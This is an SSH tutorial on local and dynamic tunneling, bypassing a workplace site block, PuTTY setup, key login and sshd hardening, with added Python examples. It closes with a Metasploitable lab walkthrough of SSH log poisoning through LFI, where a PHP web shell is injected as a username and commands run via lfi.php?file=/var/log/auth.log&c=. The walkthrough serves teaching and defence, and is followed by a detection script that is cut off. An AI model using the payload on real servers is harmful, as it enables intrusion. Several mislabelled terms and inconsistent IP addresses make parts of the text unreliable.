How to perform Local SSH Tunneling?

What is Local SSH Tunneling?

What happens when local SSH tunneling occurs? Essentially, the host and port that a client connects to locally are translated into the host and port at the remote end of the channel: a client application connects to the local endpoint of the channel, and the remote endpoint in turn connects to the destination on its behalf.

Let’s take an example of local SSH tunneling to see how effective it can be. Suppose the company you work for deliberately blocks Facebook.com, so that with normal internet access the site cannot be reached by an innocent worker inside the company. Such a restriction can be bypassed simply by creating an SSH tunnel.

Call the machine inside the company “work” and the remote machine “home”. “work” wants to connect to “home” over an SSH channel. Since the home machine will act as the remote server for whatever services are needed, it must have a public IP address to connect to in the first place. The following command is executed on the work machine to establish the tunnel.

ssh -L 9001:facebook.com:80 home

Note that in the previous command “-L” selects local port forwarding, the local port to be forwarded is 9001, the remote host is Facebook.com and the remote port is 80; the connection to that host and port is made from the home machine. In general, the syntax is:

-L <local-port-to-listen>:<remote-host>:<remote-port>

This means that the SSH client on the work machine connects to the SSH server on the home machine, normally on port 22, and binds port 9001 on the work machine to listen for local requests.

Connecting to Facebook.com is then no longer the work machine’s business; the home machine does it, connecting to Facebook.com on port 80. It is also important to know that when the home machine connects to Facebook.com, it does so without any encryption.

Opening http://localhost:9001 in a browser on the work machine therefore yields a connection to the home machine, from which Facebook.com is loaded. Seen this way, the remote device at home is simply a gateway between the work machine and Facebook.com. The full general syntax then becomes:

ssh -L <local-port-to-listen>:<remote-host>:<remote-port> <gateway>

It is also possible to use a port on the home computer itself instead of connecting to an external host. The following syntax is used in that case.

ssh -L 5900:localhost:5900 home (executed from 'work')

What does this command do? A connection is established to port 5900 on the home machine, where a VNC client could be listening. Any kind of TCP data can be carried this way; the tunnel is not limited to browsing sessions.

By the same method, SSH sessions themselves can be tunneled. This is useful when you need an SSH session with a computer that is banned from your network. The banned computer is reached through an SSH tunnel using local port forwarding, with the following command; the data transferred between the work machine and the banned machine is encrypted on the way.

ssh -L 9001:banned:22 home

Then connect with SSH to port 9001 on localhost; the session is tunneled to the banned computer via the home machine.

ssh -p 9001 localhost
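
The address translation described above, as an added example that is not part of the original article: a clear-text Python relay that does what the “-L” listener on the work machine and the far-end connection on the home machine do, with the encryption of the SSH hop left out. The echo service standing in for the remote host is constructed for the demo; the listener binds to loopback only, which is also OpenSSH’s default.

```python
import socket
import threading


def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until EOF, then half-close dst so the peer sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def splice(client: socket.socket, remote_host: str, remote_port: int) -> None:
    """The far end's job: connect to the fixed <remote-host>:<remote-port> and relay both ways."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()  # destination unreachable: the local connection is simply dropped
        return
    back = threading.Thread(target=pipe, args=(remote, client), daemon=True)
    back.start()
    pipe(client, remote)
    back.join()
    client.close()
    remote.close()


class LocalForward:
    """Listener playing the role of `ssh -L` on the local ("work") machine; serving starts at once.

    bind_addr defaults to loopback, matching OpenSSH's default (GatewayPorts no):
    other hosts on the LAN cannot use the forwarded port.
    """

    def __init__(self, local_port: int, remote_host: str, remote_port: int,
                 bind_addr: str = "127.0.0.1") -> None:
        self.remote = (remote_host, remote_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, local_port))
        self.listener.listen(16)
        self.bind_addr, self.local_port = self.listener.getsockname()[:2]  # port resolved if 0
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return  # listener closed by close()
            threading.Thread(target=splice, args=(client, *self.remote), daemon=True).start()

    def close(self) -> None:
        self.listener.close()


def start_echo_service() -> socket.socket:
    """Constructed stand-in for the remote service; echoes what it receives. Returns the listener."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=pipe, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo_roundtrip(payload: bytes = b"hello through the tunnel") -> bytes:
    """Send payload to the forwarded local port and return what the remote service answers."""
    echo = start_echo_service()
    fwd = LocalForward(0, "127.0.0.1", echo.getsockname()[1])
    try:
        with socket.create_connection(("127.0.0.1", fwd.local_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # we are done sending; EOF propagates through the relay
            received = b""
            while chunk := c.recv(4096):
                received += chunk
        return received
    finally:
        fwd.close()
        echo.close()
```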

How can local SSH Tunneling be performed? 

A useful property of local SSH tunneling is that it can reach a computer that has no connection to the internet. Whereas dynamic tunneling needs a SOCKS proxy in order to tunnel all TCP traffic, local tunneling needs the IP address of the destination machine.

In the following lines, we establish a connection between a remote PC and a local system on a different network. Take the following five points as given before starting:

  1. There is an SSH server with two Ethernet interfaces.
  2. Its local IP address is 192.168.1.217,
  3. while the IP address of the remote machine is 192.168.1.219.
  4. The server’s second interface is connected to the local network system 192.168.10.2.
  5. The IP address of the SSH client is 192.168.10.2.

The following steps establish the local SSH tunnel:

  1. Open the terminal and type the following command to get the network configuration:
    ifconfig
  2. The SSH server’s configuration should now show that two IP addresses are attached:
    192.168.1.217 and 192.168.10.1
  3. Running the same command on the SSH client should show its IP address:
    192.168.10.2
  4. When the remote PC with IP address 192.168.1.219 attempts to connect to the SSH server with IP address 192.168.1.217, it logs in to the server successfully through port 22.
  5. However, if the same remote machine (192.168.1.219) tries to connect to the SSH client (192.168.10.2), a network error appears, since the two machines belong to different networks.
  6. Let’s now use PuTTY to establish the SSH local tunnel.

7. Connect to the SSH server with IP address 192.168.1.22 through port 22.

8. Navigate to the left-hand “Category” column, choose “SSH” and click “Tunnel” under it.

9. Then type 7000, for instance, as the “Source port”.

10. Type 192.168.10.2:22 as the “Destination”.

11. Select “Local”, then press “Add”.

12. Once added, press “Open”.

13. The connection between the remote PC and the SSH server should now be up.

14. Open PuTTY again, or open a new window of it.

15. Under “Host Name (or IP address)” type a host name, for example simply “localhost”.

16. Under “Port” type “7000”, which we configured before.

17. Connecting to the SSH client now yields a connection with no network error. Congratulations!!

How to Perform Dynamic SSH Tunneling?

What is Dynamic SSH Tunneling?

One of the most effective SSH tunneling methods is dynamic tunneling, which lets a single tunnel reach many different remote destinations. How does this work? SSH opens a SOCKS service on one port, and an application sends its traffic to that port. The SOCKS proxy created on the client side is what lets an application specify the destination its traffic should go to when it leaves the other end of the SSH tunnel. The following command is typed on the work machine.

ssh -D 9001 home (executed from 'work')

It is important to understand this command well. “-D” selects dynamic SSH tunneling: SSH creates a SOCKS proxy that listens for all connections on port 9001. Requests are then routed between the work and home machines, depending on their direction, through an encrypted SSH channel. For this to work, the browser must be configured to use the SOCKS proxy at localhost, port 9001.

How can SOCKS relate to SSH tunnels?

SOCKS5 is a means of securing a connection between two remote devices when SSH is used to establish the connection between them. So what is the difference between SSH and SOCKS in this regard? To establish an SSH service or connection, a specific port on the remote machine has to be specified. SOCKS, on the other hand, allows an entire application to run remotely through a local SOCKS proxy server; there is no longer any need to specify a particular remote server or port to connect to, which gives the user comparatively more freedom.

Now consider the case where an application does not support SOCKS at all. What is the solution? A proxifier. A proxifier is simply a program that lets any other program connect through a proxy server even if that program has no proxy support of its own, by intercepting its network requests and modifying them before they pass through the proxy server. In this way an application is redirected to a local SOCKS proxy server. Some proxifiers, such as ProxyCap, support SSH directly, which removes the need for a separate SSH client.
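
To make the difference between “-L” and “-D” concrete, here is an added example (not from the original article) that builds and parses the SOCKS5 messages a browser sends to the proxy port 9001 set up above, following RFC 1928: the far end learns the destination from each request rather than from the command line. The `reachable` set in the simulation is a constructed stand-in for what the home machine can actually reach.

```python
import ipaddress
import struct

# SOCKS5 field values from RFC 1928.
VER = 0x05
METHOD_NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED, REP_HOST_UNREACHABLE = 0x00, 0x04


def greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """Client hello: version, number of authentication methods offered, the methods."""
    return bytes([VER, len(methods), *methods])


def encode_address(host: str) -> bytes:
    """ATYP + DST.ADDR: IPv4/IPv6 as packed bytes, anything else as a length-prefixed name."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        raw = host.encode("idna")
        if len(raw) > 255:
            raise ValueError("domain name too long for SOCKS5")
        return bytes([ATYP_DOMAIN, len(raw)]) + raw
    return bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed


def connect_request(host: str, port: int) -> bytes:
    """What the browser sends for each connection: where THIS one should go."""
    if not 0 < port <= 0xFFFF:
        raise ValueError("port out of range")
    return bytes([VER, CMD_CONNECT, 0x00]) + encode_address(host) + struct.pack("!H", port)


def decode_address(buf: bytes, off: int) -> tuple[str, int]:
    """Parse ATYP + DST.ADDR at off; return (host, offset just past the address)."""
    atyp, off = buf[off], off + 1
    if atyp == ATYP_IPV4:
        return str(ipaddress.IPv4Address(buf[off:off + 4])), off + 4
    if atyp == ATYP_IPV6:
        return str(ipaddress.IPv6Address(buf[off:off + 16])), off + 16
    if atyp == ATYP_DOMAIN:
        n, off = buf[off], off + 1
        return buf[off:off + n].decode("idna"), off + n
    raise ValueError(f"unknown address type {atyp:#x}")


def parse_connect_request(buf: bytes) -> tuple[str, int]:
    """Proxy side: validate a CONNECT request and extract the destination to dial."""
    if len(buf) < 8 or buf[0] != VER:
        raise ValueError("not a SOCKS5 request")
    if buf[1] != CMD_CONNECT:
        raise ValueError("only CONNECT is handled here (no BIND / UDP ASSOCIATE)")
    if buf[2] != 0x00:
        raise ValueError("reserved byte must be zero")
    host, off = decode_address(buf, 3)
    if off + 2 != len(buf):
        raise ValueError("truncated request or trailing bytes")
    return host, struct.unpack("!H", buf[off:])[0]


def reply(rep: int, bind_host: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """Proxy answer; REP 0x00 means the outbound connection is up and data may flow."""
    return bytes([VER, rep, 0x00]) + encode_address(bind_host) + struct.pack("!H", bind_port)


def simulate_dynamic_tunnel(host: str, port: int, reachable: frozenset) -> dict:
    """Both sides of the handshake for one browser connection through `ssh -D 9001 home`.

    `reachable` is a constructed stand-in for what the far end (home) can actually dial;
    nothing here touches the network.
    """
    hello = greeting()
    chosen = bytes([VER, METHOD_NO_AUTH])  # OpenSSH's -D offers no SOCKS authentication
    request = connect_request(host, port)
    dst_host, dst_port = parse_connect_request(request)  # the far end learns the target here
    rep = REP_SUCCEEDED if dst_host in reachable else REP_HOST_UNREACHABLE
    return {"hello": hello, "method": chosen, "request": request,
            "destination": (dst_host, dst_port), "reply": reply(rep)}
```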

How can dynamic SSH Tunneling be performed? 

In the following lines we walk through the steps to establish a connection between a remote machine and a local system on a different network. Take the following five points as given before starting:

  1. There is an SSH server with two Ethernet interfaces.
  2. Its local IP address is 192.168.1.22.
  3. The IP address of the remote system, which lies outside the network, is 192.168.1.21.
  4. 192.168.10.2 is a system on another local network.
  5. The SSH client has the IP address 192.168.1.21.

The following steps establish the remote SSH tunnel. A remote machine with IP address 192.168.1.21 attempts to connect to a local machine on the work network with IP address 192.168.10.2, and the attempt is denied because a firewall blocks such incoming traffic. For the remote machine to reach a local machine inside the network, it connects to an SSH server inside the network, which forwards the connection to the SSH client inside the network. Both the SSH client and the SSH server must have the SSH service running.

  1. Open the terminal and type the following command to get the network configuration:
    ifconfig
  2. The SSH server’s configuration should now show that two IP addresses are attached:
    192.168.1.22 and 192.168.0.1
  3. Running the same command on the SSH client (Ubuntu) should show its IP address:
    192.168.10.2
  4. When the remote PC with IP address 192.168.1.21 attempts to connect to the SSH server with IP address 192.168.1.22, it logs in to the server successfully through port 22.
  5. However, if the same remote machine (192.168.1.21) tries to connect to the SSH client (192.168.10.2), a network error appears, since the two machines belong to different networks.
  6. Let’s use PuTTY to establish the SSH tunnel.

7. Connect to the SSH server with IP address 192.168.1.22 through port 22.

8. Navigate to the left-hand “Category” column, choose “SSH” and click “Tunnel” under it.

9. Then type 7000, for instance, as the “Source port”.

10. Select “Dynamic”, then press “Add”.

11. Once added, press “Open”.

12. The connection between the remote PC and the SSH server should now be up.

13. Open PuTTY again, or open a new window of it.

14. Under “Host Name (or IP address)” type “192.168.10.2”.

15. Under “Port” type “22” for the SSH service.

16. Press “Open”.

17. Open the previously used PuTTY window again.

18. Navigate to the left-hand “Category” column, choose “Connection” and click “Proxy” under it.

19. Then, as the “Proxy type”, select “SOCKS5”.

20. Under “Host Name (or IP address)” type “127.0.0.1”.

21. Under “Port” type “7000”, which was configured previously.

22. Now press “Open”.

23. Connecting to the SSH client now yields a connection with no network error; port 7000 is the port used in this method. Congratulations!!

How to secure an SSH connection?

Quick Background about SSH:

SSH is a cryptographic network protocol that operates at the application layer of the Internet protocol suite. What is it for? It is mainly used to operate securely over a network that is not secured; for example, users can access computer systems remotely through it.

SSH uses a client-server architecture: an SSH client connects to an SSH server. While most applications of it are command-line login and remote command execution, it can secure any network service, using either of its two versions, SSH-1 or SSH-2.

Quick Background about PuTTY:

The name PuTTY has no official meaning. PuTTY is free and open-source software: a terminal emulator, serial console and network file transfer application. It supports several network protocols, including Secure Copy (SCP), Secure Shell, Telnet, Rlogin and raw socket connections, and it can also connect to a serial port.

Netcat

Reading from and writing to a network connection over protocols such as the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) is a fundamental step for a security administrator and for an attacker alike; the two use whatever data they obtain for entirely different purposes.

Netcat provides an efficient means of investigating a network from the server side and of establishing new connections inside networks using those protocols. It can be run on its own or from scripts and other programs.

Kali Linux

Kali Linux is one of the most important security tools to understand and work with. Its benefits, in a nutshell:

⦁ Penetration testing and digital forensics consider it an essential tool.
⦁ It provides a variety of tools and functions, grouped into thirteen categories:
  ⦁ Information Gathering, such as Dmitry
  ⦁ Vulnerability Analysis, such as Inguma
  ⦁ Exploitation Tools, such as the Metasploit Framework
  ⦁ Wireless Attacks, such as WiFi Honey
  ⦁ Forensics, such as Binwalk
  ⦁ Web Applications, such as Skipfish
  ⦁ Stress Testing, such as FunkLoad
  ⦁ Sniffing and Spoofing, such as Wireshark
  ⦁ Password Attacks, such as TrueCrack
  ⦁ Maintaining Access, such as Intersect
  ⦁ Hardware Hacking, such as dex2jar
  ⦁ Reverse Engineering, such as Apktool
  ⦁ Reporting Tools, such as MagicTree

How to setup an SSH server using port forwarding? 

  1. Open the terminal and type the following command to install an SSH server:
    sudo apt-get install openssh-server
  2. Start the SSH service with the following command:
    service ssh start
  3. Check that it is running with the following command:
    service ssh status
  4. Now scan it with Nmap from Kali Linux’s terminal using the following command:
    nmap -sV 192.168.1.17
  5. The scan shows port 22 as open. Now use PuTTY to connect to that port: type the IP address under “Host Name”, set the port number to 22, make sure SSH is selected and click “Open”.
  6. Type the password and press “Enter” when done.

How can one secure an SSH connection?

  1. First of all, get the service configured.
  2. Let’s try port forwarding now. Open the file named “sshd_config” in the directory computer>etc>ssh.
  3. Every occurrence of port 22 should be changed to 2222. This forwards the SSH service from port 22 to port 2222.
  4. Nmap can confirm the change with the following command:
    nmap -sV 192.168.1.17
  5. Alternatively, Telnet can confirm it with the following command, which shows whether the port is open and what type of connection it is listening for:
    telnet 192.168.1.17 2222
  6. Netcat can also be used; the following command displays the service currently running on port 2222:
    nc 192.168.1.17 2222

How to set SSH Connection using PGP Keys?

  1. Download and install PuTTYgen, the PuTTY key generator.
  2. Open it and click “Generate”.
  3. A public key and a private key are generated. Save the private key for later; this is important. The file can be given any name you like.
  4. Open the Linux terminal and type the following command:
    ssh-keygen
  5. This creates a folder called “.ssh”. Inside it, create a text file named “authorized_keys”.
  6. Copy the file named “ssh login key.ppk” into the same folder.
  7. Change into the .ssh folder in the terminal and run the following command:
    puttygen -L "ssh login key.ppk"
  8. This prints the public key, which should then be copied into the empty authorized_keys file created earlier.
  9. In the PuTTY configuration, enter an Auto-login username under the Data section.
  10. Under SSH>Auth, set the path to the SSH login key, i.e. the private key.
  11. Type the IP address and the port number 2222 in their respective places under the Session tab.

12. Now click “Open”, then type the password and press “Enter”.

13. Disabling password login entirely improves security: it stops us from being vulnerable to password-guessing attacks. This is done by opening “sshd_config” under computer>etc.

14. In this file, change PasswordAuthentication from yes to no. It is set to yes by default and the line is commented out, so uncommenting the line is also important in this step.
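
Step 8 is where key-based login most often breaks in practice: the line pasted into authorized_keys must be a single OpenSSH-format line, and sshd’s StrictModes also refuses a .ssh folder or key file that others can write to. As an added example that is not the article’s own material, this Python checks an entry’s structure and those permissions; the key bytes it constructs are a fixed pattern, not a real key, and options with quoted spaces are outside what its simple tokenizer handles.

```python
import base64
import os
import stat
import struct

# Key types accepted as the type field of an OpenSSH authorized_keys line.
KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com"}


def _read_string(blob: bytes, off: int) -> tuple[bytes, int]:
    """Read one SSH wire-format string (uint32 length, then bytes) starting at off."""
    if off + 4 > len(blob):
        raise ValueError("truncated key blob")
    (n,) = struct.unpack("!I", blob[off:off + 4])
    off += 4
    if off + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off:off + n], off + n


def parse_authorized_key(line: str) -> dict:
    """Validate one authorized_keys line and return its parts, or raise ValueError."""
    line = line.strip()
    if line.startswith("----"):
        raise ValueError("RFC 4716 block pasted; convert to one line with `puttygen -L`")
    if not line or line.startswith("#"):
        raise ValueError("blank or comment line")
    tokens = line.split()  # simple split: options containing quoted spaces are not handled
    idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(tokens):
        raise ValueError("no recognised key type followed by key data")
    key_type, b64 = tokens[idx], tokens[idx + 1]
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError as exc:  # binascii.Error subclasses ValueError
        raise ValueError(f"key data is not valid base64: {exc}") from None
    inner, off = _read_string(blob, 0)
    if inner != key_type.encode():
        raise ValueError(f"type field {key_type!r} does not match blob type {inner!r}")
    info = {"options": tokens[:idx], "type": key_type, "comment": " ".join(tokens[idx + 2:])}
    if key_type == "ssh-ed25519":
        pub, off = _read_string(blob, off)
        if len(pub) != 32:
            raise ValueError(f"ed25519 public key must be 32 bytes, got {len(pub)}")
    elif key_type == "ssh-rsa":
        _e, off = _read_string(blob, off)
        n, off = _read_string(blob, off)
        info["bits"] = int.from_bytes(n, "big").bit_length()  # a leading 0x00 sign byte is harmless
    else:
        while off < len(blob):  # ecdsa: curve name + point; sk keys: key + application
            _, off = _read_string(blob, off)
    if off != len(blob):
        raise ValueError("trailing bytes after key material")
    return info


def permission_problems(ssh_dir: str) -> list[str]:
    """What sshd's StrictModes rejects: a group/world-writable .ssh folder or authorized_keys."""
    problems = []
    for path in (ssh_dir, os.path.join(ssh_dir, "authorized_keys")):
        try:
            mode = os.stat(path).st_mode
        except FileNotFoundError:
            problems.append(f"{path}: missing")
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(f"{path}: writable by group/other (mode {stat.S_IMODE(mode):o})")
    return problems


def constructed_ed25519_line(comment: str = "user@work") -> str:
    """A format-valid sample line. The 32 key bytes are a fixed pattern, NOT a real key."""
    blob = struct.pack("!I", 11) + b"ssh-ed25519" + struct.pack("!I", 32) + bytes(range(32))
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"
```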

How to do SSH port forwarding on Windows?

What is port forwarding in the first place? 

When packets traverse a network gateway such as a firewall or a router, the communication request is redirected from one combination of address and port number to another. This is an application of network address translation (NAT). The technique is especially useful when dealing with a suspicious network or being on an insecure one.

The security gain from port forwarding lies in the fact that an attacker cannot easily discover it, since it happens on the internal side of a network gateway. In other words, an attacker will not easily learn the mapping configured on the firewall from a set of important ports to other ports.

What is the purpose of port forwarding?

There are plenty of applications in which port forwarding works best, among them:

  • Running an HTTP server in a private LAN.
  • Reaching a host in a private LAN from the internet over an SSH connection.
  • Reaching a host in a private LAN from the internet over an FTP connection.
  • Running a game server in a private LAN and making it publicly available.

What about Windows and SSH? 

Windows is fine for SSH usage, though with limited integration. Unix-like operating systems can access shell accounts using SSH. When it first came into existence, SSH was intended to replace protocols such as Telnet, Rlogin, rsh and rexec.

The reason is that those protocols send valuable information such as passwords in plain text, which is completely insecure: any packet analyzer can sniff such packets, and the password then becomes easily accessible.

Why is securing SSH port important?

Hacking is very common, and it basically exploits any open port on a system. Does this mean that all ports should be closed? Of course not, since closing every port would leave the user unable to work on the device at all. The solution is to secure the ports in use even though they stay open; the SSH port is no exception.

OpenSSH and OSSH

To make the software free to use at no cost, the older 1.2.12 release of the original SSH program, which was still open source, became the starting point. In 1999, Björn Grönvall’s OSSH was released using that codebase.

OpenBSD developers then worked on developing and improving Grönvall’s code. The result was OpenSSH, which shipped with the 2.6 release of OpenBSD. OpenSSH was then ported to other operating systems through what is referred to as a portability branch.

OpenSSH supported so many operating systems that by 2005 it was the single most common SSH implementation across several platforms. OSSH, on the other hand, faded away as OpenSSH gained popularity.

Nmap

In 2005, the Network Mapper (Nmap) security scanner incorporated its own implementation of Netcat under the new name Ncat, which, like Nmap, is cross-platform. Several features were added to it:

⦁ Redirection of TCP/UDP connections
⦁ Connection brokering
⦁ SOCKS4 support on both the client and the server side
⦁ Chaining of Ncat processes
⦁ Proxy chaining, a feature often referred to as HTTP CONNECT proxying
⦁ Listening on and connecting to Secure Sockets Layer (SSL) endpoints
⦁ Filtering by Internet Protocol (IP) address/connection

How to perform port forwarding to secure SSH port in Windows?

  1. Download and install the OpenSSH tool on your Windows machine.
  2. Make sure that port 22 is open. This can be checked with the Nmap security tool using the following command:
    nmap 192.168.1.17
  3. Let’s assume it is open and already listening for the SSH service.
  4. Open the file named “sshd_config”, found in the following directory:
    my computer>local Disk(C:)>program files>OpenSSH>etc
  5. Port 22 appears as the listening port. Change it to 3221, for instance.

6. This means that SSH now listens on port 3221 instead of port 22.

7. Go back to the command prompt and restart the SSH service on the machine so that the new port takes effect. The following commands first stop the service and then start it again.

C:\WINDOWS\SYSTEM32>net stop opensshd
C:\WINDOWS\SYSTEM32>net start opensshd

8. Nmap can confirm the change with a scan as well, using the following command.

nmap -A 192.168.1.17

9. The scan clearly shows the forwarded port, 3221, so it is still easy for attackers to get into the system.
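
An added example, not the article’s own code, that audits the sshd_config edits made here and in the earlier section “How can one secure an SSH connection?”: it applies sshd’s first-match rule, treats commented-out lines as defaults (which is why merely uncommenting the PasswordAuthentication line matters), and records the point made in step 9, that a moved port is still found by a scan. The sample configuration is constructed.

```python
import re

# sshd_config(5) defaults for the directives audited here; a directive that never appears
# on an uncommented line takes the default, however many commented "#Key value" hints exist.
DEFAULTS = {"port": "22", "passwordauthentication": "yes", "pubkeyauthentication": "yes",
            "permitrootlogin": "prohibit-password"}

# Constructed excerpt resembling a stock sshd_config (not taken from the article).
STOCK_CONFIG = """\
#Port 22
#AddressFamily any
#PubkeyAuthentication yes
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no
"""

LINE_RE = re.compile(r"([A-Za-z][A-Za-z0-9]*)\s*(?:=\s*)?(.*)")  # "Key value" or "Key=value"


def parse_sshd_config(text: str) -> dict[str, list[str]]:
    """Effective global directives, applying sshd's rules: keywords are case-insensitive,
    '#' lines are comments even if they look like settings, the FIRST occurrence of a
    directive wins (Port/ListenAddress may repeat), and everything from the first Match
    line on is conditional, so it is left out of the global view."""
    effective: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        if key in ("port", "listenaddress"):
            effective.setdefault(key, []).append(value)
        else:
            effective.setdefault(key, [value])
    return effective


def effective(cfg: dict[str, list[str]], key: str) -> list[str]:
    """Value(s) sshd would use for key: configured, else the built-in default."""
    return cfg.get(key.lower()) or [DEFAULTS[key.lower()]]


def audit(text: str) -> list[str]:
    """Findings for the edits the article makes, plus the caveat it closes on."""
    cfg, findings = parse_sshd_config(text), []
    ports = effective(cfg, "Port")
    if "22" in ports:
        findings.append("sshd listens on port 22 (default or explicit)")
    else:
        findings.append(f"non-default port {','.join(ports)}: moves the service but does not "
                        "hide it from a version scan such as nmap -sV")
    if effective(cfg, "PasswordAuthentication")[0].lower() != "no":
        findings.append("PasswordAuthentication is effectively yes: password guessing stays possible")
    if effective(cfg, "PubkeyAuthentication")[0].lower() != "yes":
        findings.append("PubkeyAuthentication disabled: the key login set up earlier would fail")
    if effective(cfg, "PermitRootLogin")[0].lower() == "yes":
        findings.append("PermitRootLogin yes")
    return findings


def set_directive(text: str, key: str, value: str) -> str:
    """Rewrite text so that `key value` is the effective global setting.

    Replaces the first live line for key, or uncomments the stock '#key ...' hint in place,
    or inserts before the first Match block / at the end. Later live duplicates are
    commented out, since first-match would silently ignore them anyway."""
    live = re.compile(rf"\s*{re.escape(key)}\b", re.IGNORECASE)
    hint = re.compile(rf"\s*#\s*{re.escape(key)}\b", re.IGNORECASE)
    out, done = [], False
    for line in text.splitlines():
        if not done and re.match(r"\s*match\b", line, re.IGNORECASE):
            out.append(f"{key} {value}")
            done = True
        if live.match(line):
            out.append("#" + line if done else f"{key} {value}")
            done = True
            continue
        if not done and hint.match(line):
            out.append(f"{key} {value}")
            done = True
            continue
        out.append(line)
    if not done:
        out.append(f"{key} {value}")
    return "\n".join(out) + "\n"


def harden(text: str, port: str = "2222") -> str:
    """The article's two edits: move the listening port and turn password login off."""
    return set_directive(set_directive(text, "Port", port), "PasswordAuthentication", "no")
```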

How to perform SSH Log Poisoning through LFI to exploit a web server?

It is worth knowing a powerful method of exploiting a web server that suffers from local file inclusion (LFI). Let’s assume the target is a Metasploitable 2 machine and the operating system used to run the attack is Kali Linux.

The following steps explain how this is done from Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."

    LFI

  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2
  12. Let's assume that you have previously created an LFI page and now try to browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error appears that looks like a local file inclusion vulnerability.
  14. Now include the auth.log file as the parameter through the following URL in the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning displays with the following text:
    Warning cannot execute a blank command
  16. Let's discuss what this actually means. The PHP code injected earlier, the one containing the system() command call, is now part of the included log. Any command can now be sent as a parameter.
  17. Now browse to
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    This dumps the contents of auth.log and also executes the command given through the c parameter.
  18. Now browse to
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd"
    This way, the results display inside the browser window.
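From the defender's side, the walkthrough above leaves two artefacts behind: a PHP open tag inside an sshd "invalid user" entry, and a web request whose file= parameter points outside the web root. The following Python script is an added example (not code from the original article or from hackingarticles.in) that scans constructed sample auth.log and Apache access-log lines for both. The log lines, the 192.168.1.x addresses and the /lfi/lfi.php path are assumptions modelled on the steps above.

```python
import re
from typing import Dict, List

# Constructed sample auth.log lines for this example (not captured from the
# page's lab). Line 2 mirrors the poisoned entry the walkthrough describes.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:12 web sshd[2112]: Failed password for invalid user hacker from 192.168.1.104 port 56566 ssh2
Mar  3 10:02:40 web sshd[2118]: Failed password for invalid user <?php system($_GET['c']); ?> from 192.168.1.104 port 49642 ssh2
Mar  3 10:03:05 web sshd[2120]: Accepted password for alice from 192.168.1.50 port 40022 ssh2
Mar  3 10:04:17 web sshd[2125]: Failed password for invalid user <? echo 'x'; ?> from 192.168.1.104 port 49700 ssh2
"""

# Constructed access-log lines (combined log format) showing the include
# requests from steps 14, 17 and 18 next to an ordinary request.
SAMPLE_ACCESS_LOG = """\
192.168.1.104 - - [03/Mar/2018:10:05:01 +0000] "GET /lfi/lfi.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.104 - - [03/Mar/2018:10:05:30 +0000] "GET /lfi/lfi.php?file=/var/log/auth.log HTTP/1.1" 200 98304 "-" "Mozilla/5.0"
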